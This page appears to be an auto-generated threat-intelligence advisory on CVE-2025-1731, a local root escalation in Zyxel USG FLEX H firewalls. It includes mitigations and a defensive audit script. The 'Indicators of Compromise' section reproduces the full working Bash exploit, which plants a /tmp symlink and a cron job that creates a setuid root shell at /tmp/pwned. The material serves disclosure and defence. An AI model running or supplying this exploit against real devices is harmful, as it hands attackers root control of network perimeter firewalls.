Zyxel USG FLEX H series uOS 1.31 - Privilege Escalation
AI Analysis
Technical Summary
The Zyxel USG FLEX H series uOS 1.31 privilege escalation vulnerability (CVE-2025-1731) stems from a flaw in the setuid root binary `/usr/sbin/fermion-wrapper` shipped with Zyxel USG FLEX H series firewalls. When invoked with the `register-status` argument, the binary follows symbolic links in the `/tmp` directory. Because `/tmp` lacks the sticky bit, any local user with shell access can plant a symbolic link there that causes `fermion-wrapper` to create a writable file at an arbitrary location with root privileges. A low-privileged attacker (e.g., the `postgres` user) can use this to overwrite critical system files or to create a cron job that executes as root. The provided exploit code, written in Bash, creates the cron job file `/etc/cron.d/runme`, which runs every minute, copies `/bin/sh` to `/tmp/pwned`, sets its SUID bit, and then removes the cron job. After approximately one hour the attacker can run `/tmp/pwned -p` to obtain a root shell, escalating from a local low-privileged user to root. The root cause is improper permission management and symbolic link following in a privileged binary, compounded by insecure `/tmp` directory permissions. Although it was tested on Zyxel FLEX100H and FLEX200H devices with firmware version 1.31, other devices and firmware versions may also be vulnerable. No patch links are currently provided, and no exploitation in the wild has been reported yet. The exploit requires local access to the device's shell but no user interaction beyond executing the exploit script. The vulnerability affects confidentiality, integrity, and availability by allowing full system compromise.
Potential Impact
For European organizations using Zyxel USG FLEX H series firewalls, this vulnerability poses a significant risk. Successful exploitation allows attackers with local access to escalate privileges to root, potentially leading to full device compromise. This can result in unauthorized access to sensitive network traffic, manipulation or disruption of firewall rules, and persistent backdoors within critical network infrastructure. Given that these firewalls often protect enterprise and government networks, exploitation could lead to data breaches, network outages, or lateral movement within corporate environments. The lack of a sticky bit on `/tmp` and the presence of a setuid root binary exacerbate the risk. Although exploitation requires local access, attackers could leverage other vulnerabilities or social engineering to gain an initial foothold. The delayed execution via cron job gives defenders a detection window, but it also lets attackers keep a low profile until the job fires. The impact on confidentiality, integrity, and availability is high, as root access on a firewall device compromises the entire network perimeter security. Organizations relying on these devices should consider the risk of insider threats or attackers who have already gained access to internal systems.
Mitigation Recommendations
1. Immediate mitigation involves restricting local shell access to trusted users only and monitoring for unusual cron jobs or file changes in `/etc/cron.d/` and `/tmp/`.
2. Apply strict permissions on the `/tmp` directory by enabling the sticky bit (`chmod +t /tmp`) to prevent unauthorized symbolic link exploitation.
3. Disable or restrict the use of the vulnerable `/usr/sbin/fermion-wrapper` binary if possible until a vendor patch is available.
4. Implement host-based intrusion detection systems (HIDS) to alert on creation of suspicious files or SUID binaries like `/tmp/pwned`.
5. Regularly audit firewall firmware versions and subscribe to Zyxel security advisories for timely patch releases.
6. Use network segmentation to limit access to firewall management interfaces and reduce the risk of local exploitation.
7. Employ multi-factor authentication and strong access controls for device management to prevent unauthorized shell access.
8. If feasible, replace vulnerable devices or firmware versions with updated, patched alternatives.
9. Monitor logs for unexpected executions of `fermion-wrapper` or cron jobs and conduct periodic integrity checks on critical system files.
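The mitigations above ask for a sticky bit on `/tmp` and for monitoring of `/tmp/` and `/etc/cron.d/`. The following POSIX shell script is an added example written for this page; it is not code from the exploit-db entry, from its author, or from Zyxel. It checks a host for exactly the conditions the technical summary describes: a world-writable `/tmp` without the sticky bit, symlinks in `/tmp` that point outside it (such as `/tmp/register_status -> /etc/cron.d/runme`), setuid files under `/tmp` (such as `/tmp/pwned`), and `/etc/cron.d` drop-ins that are writable by non-root users or not owned by root. The function names are the example's own; the paths are the ones named on this page.

```shell
#!/bin/sh
# Host-side audit for the weaknesses this advisory describes: a world-writable
# /tmp without the sticky bit, symlinks planted in /tmp that point outside it,
# setuid files left under /tmp, and writable or foreign-owned drop-ins in
# /etc/cron.d. Added example for defenders; it is not part of the exploit-db
# entry or of Zyxel's firmware. Function names are assumptions of this example;
# the paths are the ones the advisory names. Every check takes its directory as
# an argument so it can also be run against a staging copy or mounted image.

# Permission string of a path, e.g. "drwxrwxrwt". Uses ls -ld rather than
# stat -c so it works on busybox and BSD userlands as well as GNU.
perm_string() {
    ls -ld "$1" 2>/dev/null | cut -c1-10
}

# Succeeds (exit 0) when DIR is writable by "other" but has no sticky bit,
# which is the state the advisory reports for /tmp on uOS 1.31.
world_writable_no_sticky() {
    dir="${1:-/tmp}"
    [ -d "$dir" ] || return 1
    p=$(perm_string "$dir")
    [ "$(printf '%s' "$p" | cut -c9)" = "w" ] || return 1   # no world write bit: fine
    case "$(printf '%s' "$p" | cut -c10)" in
        t|T) return 1 ;;   # sticky bit present: fine
        *)   return 0 ;;   # world-writable and no sticky bit: weak
    esac
}

# Prints "link -> target" for each symlink directly inside DIR whose target is
# an absolute path outside DIR or climbs out through "..". A planted
# /tmp/register_status -> /etc/cron.d/runme is reported here.
outbound_symlinks() {
    dir="${1:-/tmp}"
    for p in "$dir"/* "$dir"/.*; do
        [ -L "$p" ] || continue
        t=$(readlink "$p") || continue
        case "$t" in
            "$dir"/*) ;;                                   # absolute, stays inside DIR
            /*|..|../*|*/..|*/../*) printf '%s -> %s\n' "$p" "$t" ;;
        esac
    done
}

# Prints every regular file under DIR with the setuid bit set (the exploit's
# payload is a setuid copy of /bin/sh at /tmp/pwned). -perm -4000 is POSIX.
setuid_files() {
    find "${1:-/tmp}" -type f -perm -4000 2>/dev/null
}

# Prints "perms owner path" for each file in DIR that is group- or
# world-writable or not owned by OWNER (default root). The exploit leaves an
# "-rw-rw-rw- root postgres" /etc/cron.d/runme behind until it self-deletes.
weak_cron_entries() {
    dir="${1:-/etc/cron.d}"
    owner="${2:-root}"
    for f in "$dir"/*; do
        [ -f "$f" ] || continue
        p=$(perm_string "$f")
        o=$(ls -ld "$f" | awk '{print $3}')
        gw=$(printf '%s' "$p" | cut -c6)
        ow=$(printf '%s' "$p" | cut -c9)
        if [ "$gw" = "w" ] || [ "$ow" = "w" ] || [ "$o" != "$owner" ]; then
            printf '%s %s %s\n' "$p" "$o" "$f"
        fi
    done
}

# Runs every check against the live paths; exit status is non-zero when any
# finding was printed, so it can sit behind a cron-driven or HIDS-triggered job.
audit_host() {
    findings=0
    if world_writable_no_sticky /tmp; then
        echo "[!] /tmp is world-writable without the sticky bit (fix: chmod +t /tmp)"
        findings=$((findings + 1))
    fi
    for check in outbound_symlinks setuid_files; do
        out=$("$check" /tmp)
        if [ -n "$out" ]; then
            printf '[!] %s under /tmp:\n%s\n' "$check" "$out"
            findings=$((findings + 1))
        fi
    done
    out=$(weak_cron_entries /etc/cron.d)
    if [ -n "$out" ]; then
        printf '[!] weak /etc/cron.d entries:\n%s\n' "$out"
        findings=$((findings + 1))
    fi
    [ "$findings" -eq 0 ]
}

# Only audit the live host when explicitly asked, so sourcing the file for its
# functions has no side effects.
if [ "${1:-}" = "--run" ]; then
    audit_host
fi
```

Run it as `sh audit.sh --run` on the appliance; a non-zero exit status means at least one finding was printed. One caveat on mitigation 2: on Linux the sticky bit by itself does not stop a privileged process from following another user's symlink. The protection comes from the kernel's `fs.protected_symlinks` sysctl (available since Linux 3.6, so present on the 4.14 kernel shown in the exploit's usage example), which refuses to follow a symlink located in a world-writable sticky directory unless the link's owner matches the follower or the directory owner. That check applies only to directories that carry the sticky bit, which is why `chmod +t /tmp` is the prerequisite and why the audit flags its absence.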
Affected Countries
Germany, France, United Kingdom, Italy, Spain, Netherlands, Poland, Belgium, Sweden, Austria
Indicators of Compromise
- exploit-code:

# Exploit Title: Zyxel USG FLEX H series uOS 1.31 - Privilege Escalation
# Date: 2025-04-23
# Exploit Author: Marco Ivaldi
# Vendor Homepage: https://www.zyxel.com/
# Version: Zyxel uOS V1.31 (see https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-incorrect-permission-assignment-and-improper-privilege-management-vulnerabilities-in-usg-flex-h-series-firewalls-04-22-2025)
# Tested on: Zyxel FLEX100H with Firmware V1.31(ABXF.0) and Zyxel FLEX200H with Firmware V1.31(ABWV.0)
# CVE: CVE-2025-1731

#!/bin/sh
#
# raptor_fermion - Zyxel fermion-wrapper root LPE exploit
# Copyright (c) 2025 Marco Ivaldi <raptor@0xdeadbeef.info>
#
# "So we wait, this is our labour... we wait."
#                                 -- Anthony Swofford on fuzzing
#
# The setuid root binary program `/usr/sbin/fermion-wrapper` distributed by
# Zyxel with some of their appliances follows symbolic links in the `/tmp`
# directory when run with the `register-status` argument. This allows local
# users with access to a Linux OS shell to trick the program into creating
# writable files at arbitrary locations in the filesystem. This vulnerability
# can be exploited to overwrite arbitrary files or locally escalate privileges
# from low-privileged user (e.g., `postgres`) to root.
#
# Note: the `/tmp` directory doesn't have the sticky bit set, which simplifies
# exploitation of this vulnerability and may also cause all sorts of havoc.
#
# ## Vulnerability information
#
# * CVE ID - CVE-2025-1731
# * High - 7.8 - CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
# * CWE-61 - https://cwe.mitre.org/data/definitions/61.html
#
# ## Relevant links
#
# * https://github.com/hnsecurity/vulns/blob/main/HNS-2025-10-zyxel-fermion.txt
# * https://security.humanativaspa.it/local-privilege-escalation-on-zyxel-usg-flex-h-series-cve-2025-1731
# * https://0xdeadc0de.xyz/blog/cve-2025-1731_cve-2025-1732
# * https://security.humanativaspa.it/tag/zyxel/
#
# ## Usage example
#
# ```
# $ ./raptor_fermion
# raptor_fermion - Zyxel fermion-wrapper root LPE exploit
# Copyright (c) 2025 Marco Ivaldi <raptor@0xdeadbeef.info>
#
# [*] Exploiting /usr/sbin/fermion-wrapper
# $ uname -a
# Linux FLEX100H-HackerHood 4.14.207-10.3.7.0-2 #5 SMP PREEMPT Thu Jan 9 04:34:58 UTC 2025 aarch64 GNU/Linux
# $ id
# uid=502(postgres) gid=502(postgres) groups=502(postgres)
# $ ls -l /usr/sbin/fermion-wrapper
# -rwsr-xr-x 1 root root 44288 Jan 9 05:34 /usr/sbin/fermion-wrapper
# {"status": 0, "registered": 1, "nebula_registered": 1, "bundle": 1}
#
# [+] Everything looks good \o/, wait an hour and check /tmp/pwned
# $ ls -l /etc/cron.d/runme
# -rw-rw-rw- 1 root postgres 79 Feb 14 15:52 /etc/cron.d/runme
# $ cat /etc/cron.d/runme
# * * * * * cp /bin/sh /tmp/pwned; chmod 4755 /tmp/pwned; rm /etc/cron.d/runme
#
# [+] Run the shell as follows to bypass bash checks: /tmp/pwned -p
#
# [about one hour later...]
#
# $ ls -l /tmp/pwned
# -rwsr-xr-x 1 root root 916608 Feb 14 16:25 /tmp/pwned
# $ /tmp/pwned -p
# # id
# uid=502(postgres) gid=502(postgres) euid=0(root) groups=502(postgres)
#
# R00t D4nc3!!!111! \o/
# ```
#
# ## Tested on
#
# * Zyxel FLEX100H with Firmware V1.31(ABXF.0) | 2025-01-09 04:35:47
# * Zyxel FLEX200H with Firmware V1.31(ABWV.0) | 2025-01-09 05:11:31
#
# *Note: other products and firmware versions may also be vulnerable.*
#
# ## Special thanks
#
# * Alessandro Sgreccia (@rainpwn) of HackerHood for his research and devices
#

echo "raptor_fermion - Zyxel fermion-wrapper root LPE exploit"
echo "Copyright (c) 2025 Marco Ivaldi <raptor@0xdeadbeef.info>"
echo

target="/usr/sbin/fermion-wrapper"
tmpfile="/tmp/register_status"
runme="/etc/cron.d/runme"
shell="/tmp/pwned"

echo "[*] Exploiting $target"
echo "$ uname -a"
uname -a
echo "$ id"
id
echo "$ ls -l $target"
ls -l $target

umask 0
rm $tmpfile
ln -s $runme /tmp/register_status
$target register-status
echo "* * * * * cp /bin/sh $shell; chmod 4755 $shell; rm $runme" > $runme

if [ "`cat $runme 2>/dev/null`" = "" ]; then
	echo "[!] Error: something went wrong ¯\\_(ツ)_/¯"
	exit 1
fi

echo
echo "[+] Everything looks good \\o/, wait an hour and check $shell"
echo "$ ls -l $runme"
ls -l $runme
echo "$ cat $runme"
cat $runme
echo
echo "[+] Run the shell as follows to bypass bash checks: $shell -p"
echo
Technical Details
- EDB ID: 52293
- Has exploit code: true
- Code language: bash
Threat ID: 68489dd87e6d765d51d5353f
Added to database: 6/10/2025, 9:04:24 PM
Last enriched: 6/11/2025, 9:13:40 PM
Last updated: 8/15/2025, 2:24:01 AM